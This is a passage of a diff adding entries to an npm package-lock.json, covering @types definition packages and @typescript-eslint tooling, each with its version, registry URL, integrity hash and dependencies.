"sha512-K0VQKziLUWkVKiRVrx4a40iPaxTUefQmjtkQofBkYRcoaaL/8rhwDWww9qWbrgicNOgnpIsMxyNIUM4+n6dUIA==" + }, + "node_modules/@types/mocha": { + "version": "10.0.6", + "resolved": "https://registry.npmjs.org/@types/mocha/-/mocha-10.0.6.tgz", + "integrity": "sha512-dJvrYWxP/UcXm36Qn36fxhUKu8A/xMRXVT2cliFF1Z7UA9liG5Psj3ezNSZw+5puH2czDXRLcXQxf8JbJt0ejg==", + "dev": true + }, + "node_modules/@types/mocha-each": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@types/mocha-each/-/mocha-each-2.0.0.tgz", + "integrity": "sha512-wZWPqB+pnH9SL7qzORZha1dBt5ypYgPYDSma9wwtQVGmu36QonRWnc8hbJwgMaCPYHTHzrAGMnwp+we/SGI2YQ==", + "dev": true, + "dependencies": { + "@types/mocha": "*" + } + }, + "node_modules/@types/ms": { + "version": "0.7.31", + "resolved": "https://registry.npmjs.org/@types/ms/-/ms-0.7.31.tgz", + "integrity": "sha512-iiUgKzV9AuaEkZqkOLDIvlQiL6ltuZd9tGcW3gwpnX8JbuiuhFlEGmmFXEXkN50Cvq7Os88IY2v0dkDqXYWVgA==" + }, + "node_modules/@types/mysql": { + "version": "2.15.21", + "resolved": "https://registry.npmjs.org/@types/mysql/-/mysql-2.15.21.tgz", + "integrity": "sha512-NPotx5CVful7yB+qZbWtXL2fA4e7aEHkihHLjklc6ID8aq7bhguHgeIoC1EmSNTAuCgI6ZXrjt2ZSaXnYX0EUg==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/node": { + "version": "18.18.3", + "resolved": "https://registry.npmjs.org/@types/node/-/node-18.18.3.tgz", + "integrity": "sha512-0OVfGupTl3NBFr8+iXpfZ8NR7jfFO+P1Q+IO/q0wbo02wYkP5gy36phojeYWpLQ6WAMjl+VfmqUk2YbUfp0irA==" + }, + "node_modules/@types/node-fetch": { + "version": "2.6.11", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.11.tgz", + "integrity": "sha512-24xFj9R5+rfQJLRyM56qh+wnVSYhyXC2tkoBndtY0U+vubqNsYXGjufB2nn8Q6gt0LrARwL6UBtMCSVCwl4B1g==", + "dependencies": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "node_modules/@types/node-forge": { + "version": "1.3.11", + "resolved": "https://registry.npmjs.org/@types/node-forge/-/node-forge-1.3.11.tgz", + "integrity": "sha512-FQx220y22OKNTqaByeBGqHWYz4cl94tpcxeFdvBo3wjG6XPBuZ0BNgNZRV5J5TFmmcsJ4IzsLkmGRiQbnYsBEQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/normalize-package-data": { + "version": "2.4.4", + "resolved": "https://registry.npmjs.org/@types/normalize-package-data/-/normalize-package-data-2.4.4.tgz", + "integrity": "sha512-37i+OaWTh9qeK4LSHPsyRC7NahnGotNuZvjLSgcPzblpHB3rrCJxAOgI5gCdKm7coonsaX1Of0ILiTcnZjbfxA==", + "dev": true + }, + "node_modules/@types/parse-json": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.0.tgz", + "integrity": "sha512-//oorEZjL6sbPcKUaCdIGlIUeH26mgzimjBB77G6XRgnDl/L5wOnpyBGRe/Mmf5CVW3PwEBE1NjiMZ/ssFh4wA==", + "dev": true + }, + "node_modules/@types/passport": { + "version": "1.0.15", + "resolved": "https://registry.npmjs.org/@types/passport/-/passport-1.0.15.tgz", + "integrity": "sha512-oHOgzPBp5eLI1U/7421qYV/ZySQXMYCBSfRkDe1tQ0YrIbLY/M/76qIXE7Bs7lFyvw1x5QqiNQ9imvh0fQHe9Q==", + "dependencies": { + "@types/express": "*" + } + }, + "node_modules/@types/passport-strategy": { + "version": "0.2.38", + "resolved": "https://registry.npmjs.org/@types/passport-strategy/-/passport-strategy-0.2.38.tgz", + "integrity": "sha512-GC6eMqqojOooq993Tmnmp7AUTbbQSgilyvpCYQjT+H6JfG/g6RGc7nXEniZlp0zyKJ0WUdOiZWLBZft9Yug1uA==", + "dependencies": { + "@types/express": "*", + "@types/passport": "*" + } + }, + "node_modules/@types/path-browserify": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/path-browserify/-/path-browserify-1.0.2.tgz", + 
"integrity": "sha512-ZkC5IUqqIFPXx3ASTTybTzmQdwHwe2C0u3eL75ldQ6T9E9IWFJodn6hIfbZGab73DfyiHN4Xw15gNxUq2FbvBA==", + "dev": true + }, + "node_modules/@types/pdf-parse": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@types/pdf-parse/-/pdf-parse-1.1.4.tgz", + "integrity": "sha512-+gbBHbNCVGGYw1S9lAIIvrHW47UYOhMIFUsJcMkMrzy1Jf0vulBN3XQIjPgnoOXveMuHnF3b57fXROnY/Or7eg==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/pg": { + "version": "8.6.1", + "resolved": "https://registry.npmjs.org/@types/pg/-/pg-8.6.1.tgz", + "integrity": "sha512-1Kc4oAGzAl7uqUStZCDvaLFqZrW9qWSjXOmBfdgyBP5La7Us6Mg4GBvRlSoaZMhQF/zSj1C8CtKMBkoiT8eL8w==", + "dependencies": { + "@types/node": "*", + "pg-protocol": "*", + "pg-types": "^2.2.0" + } + }, + "node_modules/@types/pg-pool": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/pg-pool/-/pg-pool-2.0.3.tgz", + "integrity": "sha512-fwK5WtG42Yb5RxAwxm3Cc2dJ39FlgcaNiXKvtTLAwtCn642X7dgel+w1+cLWwpSOFImR3YjsZtbkfjxbHtFAeg==", + "dependencies": { + "@types/pg": "*" + } + }, + "node_modules/@types/prop-types": { + "version": "15.7.4", + "resolved": "https://registry.npmjs.org/@types/prop-types/-/prop-types-15.7.4.tgz", + "integrity": "sha512-rZ5drC/jWjrArrS8BR6SIr4cWpW09RNTYt9AMZo3Jwwif+iacXAqgVjm0B0Bv/S1jhDXKHqRVNCbACkJ89RAnQ==" + }, + "node_modules/@types/qs": { + "version": "6.9.7", + "resolved": "https://registry.npmjs.org/@types/qs/-/qs-6.9.7.tgz", + "integrity": "sha512-FGa1F62FT09qcrueBA6qYTrJPVDzah9a+493+o2PCXsesWHIn27G98TsSMs3WPNbZIEj4+VJf6saSFpvD+3Zsw==" + }, + "node_modules/@types/range-parser": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@types/range-parser/-/range-parser-1.2.4.tgz", + "integrity": "sha512-EEhsLsD6UsDM1yFhAvy0Cjr6VwmpMWqFBCb9w07wVugF7w9nfajxLuVmngTIpgS6svCnm6Vaw+MZhoDCKnOfsw==" + }, + "node_modules/@types/react": { + "version": "17.0.40", + "resolved": "https://registry.npmjs.org/@types/react/-/react-17.0.40.tgz", + "integrity": "sha512-UrXhD/JyLH+W70nNSufXqMZNuUD2cXHu6UjCllC6pmOQgBX4SGXOH8fjRka0O0Ee0HrFxapDD8Bwn81Kmiz6jQ==", + "dependencies": { + "@types/prop-types": "*", + "@types/scheduler": "*", + "csstype": "^3.0.2" + } + }, + "node_modules/@types/react-bootstrap": { + "version": "0.32.36", + "resolved": "https://registry.npmjs.org/@types/react-bootstrap/-/react-bootstrap-0.32.36.tgz", + "integrity": "sha512-xldfs2zixagAFEafy/XzRvZH1NtjRnLfbgL0cZ2a0Eykz+iILE/Xa46tnUFcLln6ZBq1Qp9uArhIbkkuhBU30g==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-color": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@types/react-color/-/react-color-3.0.6.tgz", + "integrity": "sha512-OzPIO5AyRmLA7PlOyISlgabpYUa3En74LP8mTMa0veCA719SvYQov4WLMsHvCgXP+L+KI9yGhYnqZafVGG0P4w==", + "dev": true, + "dependencies": { + "@types/react": "*", + "@types/reactcss": "*" + } + }, + "node_modules/@types/react-dom": { + "version": "17.0.13", + "resolved": "https://registry.npmjs.org/@types/react-dom/-/react-dom-17.0.13.tgz", + "integrity": "sha512-wEP+B8hzvy6ORDv1QBhcQia4j6ea4SFIBttHYpXKPFZRviBvknq0FRh3VrIxeXUmsPkwuXVZrVGG7KUVONmXCQ==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-google-recaptcha": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@types/react-google-recaptcha/-/react-google-recaptcha-2.1.5.tgz", + "integrity": "sha512-iWTjmVttlNgp0teyh7eBXqNOQzVq2RWNiFROWjraOptRnb1OcHJehQnji0sjqIRAk9K0z8stjyhU+OLpPb0N6w==", + "dev": true, + "dependencies": { + "@types/react": 
"*" + } + }, + "node_modules/@types/react-linkify": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@types/react-linkify/-/react-linkify-1.0.0.tgz", + "integrity": "sha512-2NKXPQGaHNfh/dCqkVC55k1tAhQyNoNZa31J50nIneMVwHqUI00FAP+Lyp8e0BarPf84kn4GRVAhtWX9XJBzSQ==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/react-redux": { + "version": "7.1.33", + "resolved": "https://registry.npmjs.org/@types/react-redux/-/react-redux-7.1.33.tgz", + "integrity": "sha512-NF8m5AjWCkert+fosDsN3hAlHzpjSiXlVy9EgQEmLoBhaNXbmyeGs/aj5dQzKuF+/q+S7JQagorGDW8pJ28Hmg==", + "dependencies": { + "@types/hoist-non-react-statics": "^3.3.0", + "@types/react": "*", + "hoist-non-react-statics": "^3.3.0", + "redux": "^4.0.0" + } + }, + "node_modules/@types/react-transition-group": { + "version": "4.4.10", + "resolved": "https://registry.npmjs.org/@types/react-transition-group/-/react-transition-group-4.4.10.tgz", + "integrity": "sha512-hT/+s0VQs2ojCX823m60m5f0sL5idt9SO6Tj6Dg+rdphGPIeJbJ6CxvBYkgkGKrYeDjvIpKTR38UzmtHJOGW3Q==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/reactcss": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/@types/reactcss/-/reactcss-1.2.6.tgz", + "integrity": "sha512-qaIzpCuXNWomGR1Xq8SCFTtF4v8V27Y6f+b9+bzHiv087MylI/nTCqqdChNeWS7tslgROmYB7yeiruWX7WnqNg==", + "dev": true, + "dependencies": { + "@types/react": "*" + } + }, + "node_modules/@types/recurly__recurly-js": { + "version": "4.22.0", + "resolved": "https://registry.npmjs.org/@types/recurly__recurly-js/-/recurly__recurly-js-4.22.0.tgz", + "integrity": "sha512-2dJ1QnwcyCmxeIAzOaBx/r1JqMIqZ7rohxJMY0UynSQidEDfb9X2x3OHMthBXDtTzSFJ1usY934wakxgm7d+Wg==", + "dev": true + }, + "node_modules/@types/request": { + "version": "2.48.12", + "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.12.tgz", + "integrity": "sha512-G3sY+NpsA9jnwm0ixhAFQSJ3Q9JkpLZpJbI3GMv0mIAT0y3mRabYeINzal5WOChIiaTEGQYlHOKgkaM9EisWHw==", + "dependencies": { + "@types/caseless": "*", + "@types/node": "*", + "@types/tough-cookie": "*", + "form-data": "^2.5.0" + } + }, + "node_modules/@types/request/node_modules/form-data": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", + "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/@types/resolve": { + "version": "1.20.6", + "resolved": "https://registry.npmjs.org/@types/resolve/-/resolve-1.20.6.tgz", + "integrity": "sha512-A4STmOXPhMUtHH+S6ymgE2GiBSMqf4oTvcQZMcHzokuTLVYzXTB8ttjcgxOVaAp2lGwEdzZ0J+cRbbeevQj1UQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/retry": { + "version": "0.12.2", + "resolved": "https://registry.npmjs.org/@types/retry/-/retry-0.12.2.tgz", + "integrity": "sha512-XISRgDJ2Tc5q4TRqvgJtzsRkFYNJzZrhTdtMoGVBttwzzQJkPnS3WWTFc7kuDRoPtPakl+T+OfdEUjYJj7Jbow==", + "dev": true + }, + "node_modules/@types/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/@types/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-F3OznnSLAUxFrCEu/L5PY8+ny8DtcFRjx7fZZ9bycvXRi3KPTRS9HOitGZwvPg0juRhXFWIeKX58cnX5YqLohQ==", + "dependencies": { + "@types/glob": "*", + "@types/node": "*" + } + }, + "node_modules/@types/scheduler": { + "version": "0.16.2", + "resolved": 
"https://registry.npmjs.org/@types/scheduler/-/scheduler-0.16.2.tgz", + "integrity": "sha512-hppQEBDmlwhFAXKJX2KnWLYu5yMfi91yazPb2l+lbJiwW+wdo1gNeRA+3RgNSO39WYX2euey41KEwnqesU2Jew==" + }, + "node_modules/@types/semver": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/@types/semver/-/semver-7.5.0.tgz", + "integrity": "sha512-G8hZ6XJiHnuhQKR7ZmysCeJWE08o8T0AXtk5darsCaTVsYZhhgUrq53jizaR2FvsoeCwJhlmwTjkXBY5Pn/ZHw==" + }, + "node_modules/@types/send": { + "version": "0.17.1", + "resolved": "https://registry.npmjs.org/@types/send/-/send-0.17.1.tgz", + "integrity": "sha512-Cwo8LE/0rnvX7kIIa3QHCkcuF21c05Ayb0ZfxPiv0W8VRiZiNW/WuRupHKpqqGVGf7SUA44QSOUKaEd9lIrd/Q==", + "dependencies": { + "@types/mime": "^1", + "@types/node": "*" + } + }, + "node_modules/@types/serve-index": { + "version": "1.9.4", + "resolved": "https://registry.npmjs.org/@types/serve-index/-/serve-index-1.9.4.tgz", + "integrity": "sha512-qLpGZ/c2fhSs5gnYsQxtDEq3Oy8SXPClIXkW5ghvAvsNuVSA8k+gCONcUCS/UjLEYvYps+e8uBtfgXgvhwfNug==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/express": "*" + } + }, + "node_modules/@types/serve-static": { + "version": "1.15.7", + "resolved": "https://registry.npmjs.org/@types/serve-static/-/serve-static-1.15.7.tgz", + "integrity": "sha512-W8Ym+h8nhuRwaKPaDw34QUkwsGi6Rc4yYqvKFo5rm2FUEhCFbzVWrxXUxuKK8TASjWsysJY0nsmNCGhCOIsrOw==", + "dependencies": { + "@types/http-errors": "*", + "@types/node": "*", + "@types/send": "*" + } + }, + "node_modules/@types/set-cookie-parser": { + "version": "2.4.7", + "resolved": "https://registry.npmjs.org/@types/set-cookie-parser/-/set-cookie-parser-2.4.7.tgz", + "integrity": "sha512-+ge/loa0oTozxip6zmhRIk8Z/boU51wl9Q6QdLZcokIGMzY5lFXYy/x7Htj2HTC6/KZP1hUbZ1ekx8DYXICvWg==", + "dev": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/shimmer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@types/shimmer/-/shimmer-1.0.2.tgz", + "integrity": "sha512-dKkr1bTxbEsFlh2ARpKzcaAmsYixqt9UyCdoEZk8rHyE4iQYcDCyvSjDSf7JUWJHlJiTtbIoQjxKh6ViywqDAg==" + }, + "node_modules/@types/simple-oauth2": { + "version": "5.0.7", + "resolved": "https://registry.npmjs.org/@types/simple-oauth2/-/simple-oauth2-5.0.7.tgz", + "integrity": "sha512-8JbWVJbiTSBQP/7eiyGKyXWAqp3dKQZpaA+pdW16FCi32ujkzRMG8JfjoAzdWt6W8U591ZNdHcPtP2D7ILTKuA==", + "dev": true + }, + "node_modules/@types/sinon": { + "version": "10.0.11", + "resolved": "https://registry.npmjs.org/@types/sinon/-/sinon-10.0.11.tgz", + "integrity": "sha512-dmZsHlBsKUtBpHriNjlK0ndlvEh8dcb9uV9Afsbt89QIyydpC7NcR+nWlAhASfy3GHnxTl4FX/aKE7XZUt/B4g==", + "dev": true, + "dependencies": { + "@types/sinonjs__fake-timers": "*" + } + }, + "node_modules/@types/sinon-chai": { + "version": "3.2.8", + "resolved": "https://registry.npmjs.org/@types/sinon-chai/-/sinon-chai-3.2.8.tgz", + "integrity": "sha512-d4ImIQbT/rKMG8+AXpmcan5T2/PNeSjrYhvkwet6z0p8kzYtfgA32xzOBlbU0yqJfq+/0Ml805iFoODO0LP5/g==", + "dev": true, + "dependencies": { + "@types/chai": "*", + "@types/sinon": "*" + } + }, + "node_modules/@types/sinonjs__fake-timers": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/@types/sinonjs__fake-timers/-/sinonjs__fake-timers-8.1.1.tgz", + "integrity": "sha512-0kSuKjAS0TrGLJ0M/+8MaFkGsQhZpB6pxOmvS3K8FYI72K//YmdfoW9X2qPsAKh1mkwxGD5zib9s1FIFed6E8g==", + "dev": true + }, + "node_modules/@types/sizzle": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/@types/sizzle/-/sizzle-2.3.3.tgz", + "integrity": 
"sha512-JYM8x9EGF163bEyhdJBpR2QX1R5naCJHC8ucJylJ3w9/CVBaskdQ8WqBf8MmQrd1kRvp/a4TS8HJ+bxzR7ZJYQ==", + "dev": true + }, + "node_modules/@types/sockjs": { + "version": "0.3.36", + "resolved": "https://registry.npmjs.org/@types/sockjs/-/sockjs-0.3.36.tgz", + "integrity": "sha512-MK9V6NzAS1+Ud7JV9lJLFqW85VbC9dq3LmwZCuBe4wBDgKC0Kj/jd8Xl+nSviU+Qc3+m7umHHyHg//2KSa0a0Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/superagent": { + "version": "4.1.13", + "resolved": "https://registry.npmjs.org/@types/superagent/-/superagent-4.1.13.tgz", + "integrity": "sha512-YIGelp3ZyMiH0/A09PMAORO0EBGlF5xIKfDpK74wdYvWUs2o96b5CItJcWPdH409b7SAXIIG6p8NdU/4U2Maww==", + "dev": true, + "dependencies": { + "@types/cookiejar": "*", + "@types/node": "*" + } + }, + "node_modules/@types/tedious": { + "version": "4.0.10", + "resolved": "https://registry.npmjs.org/@types/tedious/-/tedious-4.0.10.tgz", + "integrity": "sha512-lxm0D01yaVGsX5MvcM3/gFzQi7/ETSrQVs5XTiKbm6im/z+M+/Z2qFODOi93PcHh/OLouWkvpUxKShP8H4DICQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/tough-cookie": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", + "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==" + }, + "node_modules/@types/trusted-types": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/@types/trusted-types/-/trusted-types-2.0.7.tgz", + "integrity": "sha512-ScaPdn1dQczgbl0QFTeTOmVHFULt394XJgOQNoyVhZ6r2vLnMLJfBPd53SB52T/3G36VI1/g2MZaX0cwDuXsfw==", + "dev": true, + "optional": true + }, + "node_modules/@types/uuid": { + "version": "9.0.8", + "resolved": "https://registry.npmjs.org/@types/uuid/-/uuid-9.0.8.tgz", + "integrity": "sha512-jg+97EGIcY9AGHJJRaaPVgetKDsrTgbRjQ5Msgjh/DQKEFl0DtyRr/VCOyD1T2R1MNeWPK/u7JoGhlDZnKBAfA==", + "dev": true + }, + "node_modules/@types/validator": { + "version": "13.7.15", + "resolved": "https://registry.npmjs.org/@types/validator/-/validator-13.7.15.tgz", + "integrity": "sha512-yeinDVQunb03AEP8luErFcyf/7Lf7AzKCD0NXfgVoGCCQDNpZET8Jgq74oBgqKld3hafLbfzt/3inUdQvaFeXQ==" + }, + "node_modules/@types/warning": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@types/warning/-/warning-3.0.3.tgz", + "integrity": "sha512-D1XC7WK8K+zZEveUPY+cf4+kgauk8N4eHr/XIHXGlGYkHLud6hK9lYfZk1ry1TNh798cZUCgb6MqGEG8DkJt6Q==", + "dev": true + }, + "node_modules/@types/webidl-conversions": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/@types/webidl-conversions/-/webidl-conversions-7.0.3.tgz", + "integrity": "sha512-CiJJvcRtIgzadHCYXw7dqEnMNRjhGZlYK05Mj9OyktqV8uVT8fD2BFOB7S1uwBE3Kj2Z+4UyPmFw/Ixgw/LAlA==" + }, + "node_modules/@types/whatwg-url": { + "version": "11.0.5", + "resolved": "https://registry.npmjs.org/@types/whatwg-url/-/whatwg-url-11.0.5.tgz", + "integrity": "sha512-coYR071JRaHa+xoEvvYqvnIHaVqaYrLPbsufM9BF63HkwI5Lgmy2QR8Q5K/lYDYo5AK82wOvSOS0UsLTpTG7uQ==", + "dependencies": { + "@types/webidl-conversions": "*" + } + }, + "node_modules/@types/workerpool": { + "version": "6.4.7", + "resolved": "https://registry.npmjs.org/@types/workerpool/-/workerpool-6.4.7.tgz", + "integrity": "sha512-DI2U4obcMzFViyNjLw0xXspim++qkAJ4BWRdYPVMMFtOpTvMr6PAk3UTZEoSqnZnvgUkJ3ck97Ybk+iIfuJHMg==", + "dev": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/ws": { + "version": "8.18.1", + "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", + "integrity": 
"sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/xml-crypto": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/@types/xml-crypto/-/xml-crypto-1.4.5.tgz", + "integrity": "sha512-rHc0tlw/ixu7PCqqlpmP9KDIA79IsoV+HFnhJDsdS4MkVAEhBNaazXjv92Xf9oYjWp9e4His4Qzo8fOzoTjT+Q==", + "dependencies": { + "@types/node": "*", + "xpath": "0.0.27" + } + }, + "node_modules/@types/xml-crypto/node_modules/xpath": { + "version": "0.0.27", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.27.tgz", + "integrity": "sha512-fg03WRxtkCV6ohClePNAECYsmpKKTv5L8y/X3Dn1hQrec3POx2jHZ/0P2qQ6HvsrU1BmeqXcof3NGGueG6LxwQ==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/@types/xml-encryption": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@types/xml-encryption/-/xml-encryption-1.2.4.tgz", + "integrity": "sha512-I69K/WW1Dv7j6O3jh13z0X8sLWJRXbu5xnHDl9yHzUNDUBtUoBY058eb5s+x/WG6yZC1h8aKdI2EoyEPjyEh+Q==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/xml2js": { + "version": "0.4.14", + "resolved": "https://registry.npmjs.org/@types/xml2js/-/xml2js-0.4.14.tgz", + "integrity": "sha512-4YnrRemBShWRO2QjvUin8ESA41rH+9nQGLUGZV/1IDhi3SL9OhdpNC/MrulTWuptXKwhx/aDxE7toV0f/ypIXQ==", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@types/yargs": { + "version": "17.0.24", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", + "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", + "dev": true, + "dependencies": { + "@types/yargs-parser": "*" + } + }, + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/@types/yauzl": { + "version": "2.9.2", + "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.9.2.tgz", + "integrity": "sha512-8uALY5LTvSuHgloDVUvWP3pIauILm+8/0pDMokuDYIoNsOkSwd5AiHBTSEJjKTDcZr5z8UpgOWZkxBF4iJftoA==", + "dev": true, + "optional": true, + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/@typescript-eslint/eslint-plugin": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/eslint-plugin/-/eslint-plugin-8.0.1.tgz", + "integrity": "sha512-5g3Y7GDFsJAnY4Yhvk8sZtFfV6YNF2caLzjrRPUBzewjPCaj0yokePB4LJSobyCzGMzjZZYFbwuzbfDHlimXbQ==", + "dev": true, + "dependencies": { + "@eslint-community/regexpp": "^4.10.0", + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/type-utils": "8.0.1", + "@typescript-eslint/utils": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "graphemer": "^1.4.0", + "ignore": "^5.3.1", + "natural-compare": "^1.4.0", + "ts-api-utils": "^1.3.0" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "@typescript-eslint/parser": "^8.0.0 || ^8.0.0-alpha.0", + "eslint": "^8.57.0 || ^9.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": 
"https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/types": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/types/-/types-8.0.1.tgz", + "integrity": "sha512-PpqTVT3yCA/bIgJ12czBuE3iBlM3g4inRSC5J0QOdQFAn07TYrYEQBBKgXH1lQpglup+Zy6c1fxuwTk4MTNKIw==", + "dev": true, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/@typescript-eslint/visitor-keys": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-8.0.1.tgz", + "integrity": "sha512-W5E+o0UfUcK5EgchLZsyVWqARmsM7v54/qEq6PY3YI5arkgmCzHiuk0zKSJJbm71V0xdRna4BGomkCTXz2/LkQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@typescript-eslint/eslint-plugin/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@typescript-eslint/parser": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/parser/-/parser-8.0.1.tgz", + "integrity": "sha512-5IgYJ9EO/12pOUwiBKFkpU7rS3IU21mtXzB81TNwq2xEybcmAZrE9qwDtsb5uQd9aVO9o0fdabFyAmKveXyujg==", + "dev": true, + "dependencies": { + "@typescript-eslint/scope-manager": "8.0.1", + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/typescript-estree": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1", + "debug": "^4.3.4" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.57.0 || ^9.0.0" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@typescript-eslint/parser/node_modules/@typescript-eslint/scope-manager": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/@typescript-eslint/scope-manager/-/scope-manager-8.0.1.tgz", + "integrity": "sha512-NpixInP5dm7uukMiRyiHjRKkom5RIFA4dfiHvalanD2cF0CLUuQqxfg8PtEUo9yqJI2bBhF+pcSafqnG3UBnRQ==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "8.0.1", + "@typescript-eslint/visitor-keys": "8.0.1" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + }, + "funding": { + "type": "opencollective", + "url": 